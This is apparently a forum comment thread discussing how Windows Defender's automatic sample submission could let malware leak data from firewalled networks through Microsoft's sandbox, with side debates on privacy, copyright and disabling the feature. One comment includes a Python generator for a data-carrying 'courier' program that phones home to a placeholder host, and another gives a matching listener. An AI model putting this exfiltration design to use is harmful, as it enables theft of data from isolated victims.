"This opens interesting data leak vector for attacker and also includes some privacy concerns. It is quite common that even in isolated environments, many of the Microsoft IP address ranges are whitelisted to make sure systems will stay up to date. This enables adversary to leak data via Microsoft services which is extremely juicy covert channel."
As a user, you can just disable automatic sample submission. In fact, I'm fairly sure you can set it during installation: I've never had to go through the settings to disable it, yet it's disabled on all my installations.
But the question is, from an adversary perspective, does your victim have it disabled?
Most likely not, so you can use Microsoft as a mule to exfiltrate data from otherwise firewalled victims.
This is actually a smart idea. Make your spyware collect & encrypt data into a (new and unknown) binary and execute it, relying on the fact that Microsoft will exfiltrate it for you. When that binary itself is run (within MS' premises) it will then reach out to you with its embedded data.
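A rough sketch of that idea, in Python for readability (a real attack would compile a native executable; `exfil.example.com`, the port, and the function names are all placeholders of mine): a generator that emits a brand-new, hash-unique program carrying the stolen data, which phones home when something, such as Microsoft's sandbox, runs it.

```python
import base64
import secrets

ATTACKER_HOST = "exfil.example.com"  # placeholder address
ATTACKER_PORT = 443                  # placeholder port

def build_courier(stolen: bytes, out_path: str) -> None:
    """Write a new, never-before-seen program that embeds the stolen
    data and phones home when executed (e.g. inside MS's sandbox)."""
    payload = base64.b64encode(stolen).decode()
    nonce = secrets.token_hex(8)  # random build-id makes every copy hash-unique
    stub = f'''# build-id: {nonce}
import base64, socket
data = base64.b64decode("{payload}")
s = socket.create_connection(("{ATTACKER_HOST}", {ATTACKER_PORT}))
s.sendall(data)
s.close()
'''
    with open(out_path, "w") as f:
        f.write(stub)
```

Calling `build_courier(secret_bytes, "courier.py")` on the victim produces a file Defender has never hashed before, which is exactly what gets it submitted.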
Windows Defender on Windows 7 also submits previously unobserved binaries to Microsoft for the same reason.
Go ahead, blame Win10, though. A non-zero number of people will take your comment to heart and believe with their entire soul that you knew what you were talking about, without ever seeing my comment.
I am so tired of seeing communal ignorance on this topic. People believe whatever bullshit they want, if it fits the narrative they are trying to sell.
Since you brought up Windows 7, I'll point out that in those days Microsoft had the decency to inherit the setting from a choice made during OS installation (though even then you had to dig a little to discern the connection): https://i.imgur.com/SpqXmod.png. You further had to visit a SpyNet enrollment screen before it collected more "advanced" metadata like filenames, location, etc.: https://i.imgur.com/z3qtuxp.png
On Windows 10, even if you turn off ALL three pages of privacy-hostile options during installation: https://i.imgur.com/RjXSM6S.png
...you still wind up with a Defender that broadcasts your files: https://i.imgur.com/1M7z3nH.png
This is what I'm talking about when I complain about all the buttons and toggles to turn off just to get my OS to function the way I expect (in this case, stop indiscriminately bleeding my bits and bytes to the cloud).
The information about this isn't hidden. An operating system is complex, and thus operating system configuration is likely to be complex. Microsoft could have made things less difficult to find, you're right, but they base their defaults on the vast majority of people, like me, who are completely fine with doing what we can to improve their anti-malware service.
You're angry and that's fine.
Imagine the anger (and the fallout) if yet another malware worm used Windows to propagate across the world. People were absolutely LIVID last time, and there were lots of lawsuits against Microsoft for ILOVEYOU and Code Red and others of the era. The default settings you see today are a direct result of those events and other, smaller ones, like them.
So Windows Defender isn't bundled as a part of Windows 10?
It was also bundled as part of Windows 8.1, Windows 8, Windows 7, and Windows Vista on top of being available as a free download for Windows XP (and even 2000 during the beta phase).
The current form, after the Microsoft Security Essentials package was merged in, didn't come about until Windows 8 but Windows Defender as a product dates back to Microsoft's purchase of GIANT Software.
Whichever cutoff you pick, XP or 8, saying Defender is a Windows 10 thing is like saying Firefox is an Ubuntu 19.04 thing. Sure, Ubuntu 19.04 bundles Firefox, but so did many versions before it.
It's also worth noting that almost every antimalware product has an option to submit unknown binaries for analysis. Almost every one either enables it by default or very strongly suggests enabling it during setup, to the point that I'd imagine most installations not managed under corporate policy are submitting samples.
Also, other anti-malware apps typically upload novel binaries. And their test machines likely run them, with network access, for the same reasons that Microsoft does.
So this exfiltration channel may well have existed for decades. Whether it's been used or not is an open question, though.
Windows Defender, like many anti-malware apps, checks hashes of binaries. Anything that's new gets uploaded for testing.
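As a sketch of how that novelty check might work (the hash set and function names here are my own illustration; Defender's actual client-side fingerprinting and cloud lookup protocol aren't public in this detail), the client hashes the file and treats any hash it has never seen as a submission candidate:

```python
import hashlib

# Illustrative stand-in for a cloud reputation lookup; in reality this
# would be a query against the vendor's backend, not a local set.
KNOWN_HASHES = {
    # SHA-256 of the empty file, as an example "known" entry
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}

def sha256_of(path: str) -> str:
    """Hash a file in chunks so large binaries don't need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def should_upload(path: str) -> bool:
    """A binary whose hash has never been seen is a candidate for submission."""
    return sha256_of(path) not in KNOWN_HASHES
```

This is also why the trick in the article works at all: any freshly built binary is, by definition, a hash nobody has seen.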
Maybe not a DDoS, but if the range is naively whitelisted, maybe something more precise, exploiting the fact that the victim believes the environment to be isolated.
> Because of Windows Defender automatic sample submission, Beacon binary was uploaded to Redmond and Beacon called Home from there.
... and below ...
> They run the executable in an environment where network connectivity is available.
Why would they do that? To see what happens?
And it's not just Microsoft. Many anti-malware apps (now, probably most) upload binaries. And I'm guessing that many run them. Maybe even with network access.
SensorFu might want to repeat this test using other anti-malware apps.
That's actually disturbingly sneaky.
So how would one block this exploit? You can't test the malware properly without letting it reach its servers. But then you're also letting it upload its exfiltrated data, which would likely be encrypted.
Or a group policy update to tell Defender not to upload stuff to MS.
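For reference, on a 2019-era Windows 10 build this setting can also be inspected and changed with the Defender PowerShell cmdlets (consent values per Microsoft's documentation: 0 = always prompt, 1 = send safe samples, 2 = never send, 3 = send all samples). The equivalent Group Policy node lives under Computer Configuration → Administrative Templates → Windows Components → Windows Defender Antivirus → MAPS → "Send file samples when further analysis is required" (the exact node name varies by Windows build).

```powershell
# Query the current consent level
Get-MpPreference | Select-Object SubmitSamplesConsent

# 2 = never send samples (0 = always prompt, 1 = send safe samples, 3 = send all)
Set-MpPreference -SubmitSamplesConsent 2
```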
For users, sure, try to lock down Windows. Or (my preference) just don't use it. Or don't give it network access, if it contains any information that you care about.
Does it even matter? Extrapolating from that quote: a submitted sample could make abusive network requests against the victim (from MSFT's network, which is "trusted"), as well as network requests back to the attacker's server for control and/or data collection.
I don't think disabling it really helps. It sounds like the goal is to prevent malware on your machine from ever leaking data on your machine to some external server. But even if you disable automatic sample submission, the malware on your machine could still submit a program on its own to Microsoft that leaks your data.
It's possible that they don't need it. There are fair use exemptions for reverse engineering and automated analysis. These may be the legal basis on which anti-malware research can be conducted.
'You may sue the AV company for $1 million; users who suffered from your malware will civilly sue for $100 billion, and the government will charge you with crimes and put you away for a decade. Your move.'
There's this fascinating (to me, anyway) line between "viruses" (including worms, Trojans, and similar malware) that antivirus programs will tackle, and adware/spyware that they usually don't.
The difference between the two is whether or not there's a corporation publicly taking credit for the program and suing antivirus companies for defamation over calling it a "virus".
Adware/spyware is limited in distribution methods and payload types by the letter of the law, but otherwise the two classes are functionally identical.
if microsoft copies an application from my computer without asking, then it did not legally acquire it.
malware is a different case. malware entered my computer with the permission of the malware creator. i didn't steal it from them, but it came to me willingly. hence i am allowed to analyze it, and i am allowed to delegate that task to someone else.
I'm not sure whether an appropriate warning or option is given to third-party users of a computer, or whether administrators are required to warn third-party users about it.
I'm willing to bet it is in the license agreement for Windows and Windows Defender, so you have likely allowed Microsoft to do this.
There are several fair-use arguments you can make, at least three of them strong. But honestly, this would need to be tested in the courts one way or the other.
I don't really think copyright is conceptually a very fruitful argument here; the CFAA is likely stronger.
How so? Microsoft spent money implementing this copying, so the copy is clearly of value to them. Why shouldn't they pay for it?
 - https://www.reddit.com/r/Windows10/comments/8dmqdy/windows_d...
In the UK there have been some changes to fair dealing in the last couple of years that I'm not up to date on, but I don't know of anything that would make this allowed short of an explicit license from the copyright holder.
I'm not saying you're wrong, I'm saying it's really hard to work out how this is meant to work.
Like Bo Burnham says, I guess I should lower my expectations a lot.
Marketplace Hansa was running Bitdefender, which pwned them to Europol.
> Europol has been supporting the investigation of criminal marketplaces on the Dark Web for a number of years. With the help of Bitdefender, an internet security company advising Europol's European Cybercrime Centre (EC3), Europol provided Dutch authorities with an investigation lead into Hansa in 2016. Subsequent enquiries located the Hansa market infrastructure in the Netherlands, with follow-up investigations by the Dutch police leading to the arrest of its two administrators in Germany and the seizure of servers in the Netherlands, Germany and Lithuania. Europol and partner agencies in those countries supported the Dutch National Police to take over the Hansa marketplace on 20 June 2017 under Dutch judicial authorisation, facilitating the covert monitoring of criminal activities on the platform until it was shut down today, 20 July 2017. In the past few weeks, the Dutch Police collected valuable information on high value targets and delivery addresses for a large number of orders. Some 10 000 foreign addresses of Hansa market buyers were passed on to Europol.
In this case Beacon was sandboxed for security observation, but a build could easily be sandboxed for network-unsafe testing instead. Perhaps it's issuing malformed or high-volume requests to test internal functionality, safe in the knowledge that it's not actually connected to anything, and so it becomes a DoS attack when it's launched in the wild.
Or worse, maybe it's calling home to an endpoint that does something when it gets the call. It's not hard to imagine somebody putting together a binary with any required auth baked in on the logic "this only exists on my machine", and then suddenly getting it called from Redmond as well. Best practices ought to handle that alright, but it's still an awfully surprising thing to have happen to your test build.
Create a binary that sends info when started, submit it and wait for it to send the info from Redmond to your server.
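The receiving end needs nothing fancy. A minimal sketch in Python (the port and function name are illustrative): a listener that records the source address of whoever connects, so a connection arriving from a Microsoft range rather than the victim's IP is the tell that the sample was detonated in Redmond.

```python
import socket

def wait_for_beacon(port: int = 1025) -> tuple:
    """Accept one connection and return (source_ip, data_received).
    A source IP inside Microsoft's ranges, rather than the victim's,
    indicates the sample was executed in their sandbox."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(1)
    conn, (src_ip, _) = srv.accept()
    data = conn.recv(4096)
    conn.close()
    srv.close()
    return src_ip, data
```

In practice you'd log every connection rather than just the first, and compare the source against Microsoft's published address ranges.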
Too bad there is no return channel, or you could run IP over Windows Update.
How many bitcoins can you mine in 30 seconds with a silly-low CPU cap?
Somewhere in the region of $5e-9 worth of bitcoins.
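That figure holds up as an order-of-magnitude estimate. The numbers below (network hashrate, CPU hashrate, reward, and price) are rough 2019-era values assumed purely for illustration:

```python
# Rough 2019-era figures, assumed for illustration only.
cpu_hashrate = 1e7        # ~10 MH/s for a CPU mining SHA-256d (generous)
network_hashrate = 5e19   # ~50 EH/s total Bitcoin network
block_reward = 12.5       # BTC per block at the time
block_interval = 600.0    # seconds per block on average
btc_price = 10_000.0      # USD per BTC

seconds = 30
expected_blocks = seconds / block_interval
expected_btc = expected_blocks * block_reward * (cpu_hashrate / network_hashrate)
expected_usd = expected_btc * btc_price
print(f"{expected_usd:.1e} USD")  # on the order of 1e-9 USD
```

So a few nano-dollars per sandboxed run; you would need billions of submissions to earn a cent.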
A while back in my company we were deploying a client management tool (think TeamViewer but with more background management and software deployment capabilities). It needed to be very easy to install, so we just had a link to an EXE file that needed to be opened by our on-site IT departments. No extra steps were required.
Imagine our surprise when we suddenly saw machines popping up that were totally unfamiliar. These were machines connecting from a Microsoft IP, and all had random (but similarly formatted) usernames. They also provided random mouse inputs. We could even take control of these machines (!) but apparently they were short lived VMs that only existed for a few minutes before being recycled.
I contacted Microsoft support because at first we thought this may be a manual process (because of the mouse inputs and the user names), and we didn't want Microsoft employees seeing user data. Afterwards I also commented to the support person that someone may use these temporary machines as an attack vector (to use as an anonymous source, or in a DDoS attack), but the ticket was closed and if I recall correctly this was deemed "working as designed".
Now I don't have to, I can just point to this thread and this comment.
This is pure arrogance: they know they have the whole corporate world stuck with Office; even an immediate move to open source would take 20 years, mostly because of tight Excel integration and accumulated expertise. We would all benefit from good competition in this area...
Even if you're developing? Even if you're developing proprietary applications not for public use?
All your code are belong to us.
People look at me as if we're crazy for worrying about this possibility, even though the Microsoft of 2019 is notoriously vague about how any of this works, and we could be flagrantly violating multiple laws and contractual obligations if it happened.
With that said -- there's still room for due diligence. I've built systems which handle personal data, and we pretty much started with Debian minimal and worked from there. To make damn sure, we stuck them behind a whitelisted firewall. They had access only to things we allowed them to see, and only in the direction we allowed.
Interestingly, Apple's now doing sort of the opposite of this. Instead of having the end-user's computer upload all executables to Apple for analysis, Apple requires the developer send them over and have them "notarized" before they run.
It was not so much that Kaspersky was acting as malware, but that they were sending tips to the FSB.
How did the author reach this conclusion? Is it documented somewhere?
Wait, what? Let's say you write code that you compile using MSVC or MinGW or whatever to an .exe file.
Surely there is no way this gets automatically sent to MS?
Edit: forgot link: https://rustup.rs/
I believe macOS 10.15 also does this, because there's a massive delay the first time I run a binary compiled with clang.
Why does MS run unknown executables? On the other hand, should be a nice DDoS provider for blackhats...
If it tried to do something like a DDoS, it would be identified as doing so and marked as malware; end of test.
This seems like a questionable assumption. Microsoft is in the media for being "better" these days, but doing this at all seems like bad judgement. MSFT has the lawyers to win a fair-use case, I'll grant that, but large corporations don't have much incentive to minimize negative externalities, precisely because of those lawyers and the money for them.
The exe must have been running to be able to generate the proper encrypted payload and send it to right place. In this case ports 20 and 1025 over TCP.
Disclaimer: I am one of the people who wrote the software.
Lesson: clear pricing keeps people like me in the game
When I actually am interested enough to talk to their salespeople (and they're straightforward enough with me) they've told me it helps them target whales more easily.
They can charge a lot more to a huge Enterprise and adjust lower for SMBs.
Case in point: a large FTSE-, NYSE-, or NASDAQ-listed company with largely siloed internal departments, all with their own budgets. Your yearly budget might be $20,000, but they see the Inc. or Plc. with a turnover in the hundreds of millions and quote accordingly...
That situation makes for some fun sales calls.
Unknown costs, talking to other people, negotiating; these things produce trace amounts of anxiety. Anxiety I'd rather not deal with. A simple Pricing page solves this.
I'd rather spend an hour googling your competitors than contact someone for a quote.
(1) 'Enterprise' oriented software, in which case it is too expensive for you anyway (those long and personal sales trajectories, negotiations and commissions have to be recouped somehow)
(2) Not actually a product, but a Trojan horse to sell you lots of consulting and bespoke development services.
That's not only a privacy concern; it's blatant copyright infringement.
I'm not talking about invulnerable software; I'm talking about the comments assuming Microsoft doesn't expect __malware testing servers__ to run scanning or DDoS malware.
This may be outdated, but you can also configure Defender to always prompt before sending.
It would be interesting to set it to always prompt and see what triggers it. There must be some level of fingerprinting done on the client (a hash of the binary, network activity, etc.) that can be compared against known threats.
Just create a native executable in your language of choice that connects to a hardcoded address of a server you have access to and try executing it on a windows machine with sample submission enabled.
So your attack might require first controlling a swarm of Windows 10 machines, in which case you might as well do it directly :P
If you're testing that your binary builds requests properly, maybe you've got it making them as fast as possible and you're running it without network permissions. Fine, until it suddenly runs with full network access and hammers whatever service you're pointing at.
Seriously, what in hell? Like always, blatant violations of users in the name of "security".
Now, if a covered medical software company accidentally let a build with accessible PHI go to Microsoft, I guess it's possible they could be HIPAA liable. But that's a pretty narrow case, and not one that's a threat to Microsoft.
Until the medical software company sues Microsoft for damages to recoup the HIPAA fine. This is probably buried in some clickwrap contract though. (IANAL; not sure how enforceable such a contract would be)
(As an aside, if they are sweeping data on such a broad scale without being transparent about it and the only authorisation for doing so is buried deep in some legal document, it would be interesting to consider whether they were not only potentially in breach of GDPR but also various criminal computer misuse laws.)
2. In business/corporate environments especially, there are many options that should be managed via group policy by a properly functioning IT team, as one of their many tasks.
It probably also allows them to do some spying on networks used by malware.